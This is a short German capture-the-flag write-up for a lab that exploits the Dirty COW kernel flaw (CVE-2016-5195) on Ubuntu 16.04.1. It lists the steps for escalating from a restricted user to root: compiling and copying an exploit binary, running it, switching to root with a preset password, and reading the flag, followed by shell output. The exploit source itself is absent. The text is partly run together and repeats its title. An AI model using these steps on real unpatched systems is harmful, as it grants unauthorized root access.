
Ausnutzung der Dirty-COW-Sicherheitslücke (CVE-2016-5195) unter Ubuntu 16.04.1.
Ausnutzung der Dirty-COW-Schwachstelle (CVE-2016-5195) unter Ubuntu 16.04.1.
cat > README.md <<'EOF'
Dieses Labor demonstriert die Ausnutzung der Dirty-COW-Schwachstelle auf einem Ubuntu Server 16.04.1 mit verwundbarem Kernel.
Das Ziel war es, die Privilegieneskalation von einem eingeschränkten Benutzer (student) zu root durchzuführen und die unter /root/flag.txt abgelegte Flag zu erlangen.
Linux 4.4.0-31-generic (verwundbar).ubuntu:16.04 wurde dirtycow_passwd.c kompiliert → Binärdatei dirty.scp dirty student@<IP>:~/.chmod +x ~/dirty && ~/dirty → su root (Passwort dirtyCowFun).cat /root/flag.txt → 4GEEKS{Y0u_G0t_R00t}.root@ubuntu:/home/student# whoami
root
root@ubuntu:/home/student# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/student# cat /root/flag.txt
4GEEKS{Y0u_G0t_R00t}
Flag obtenida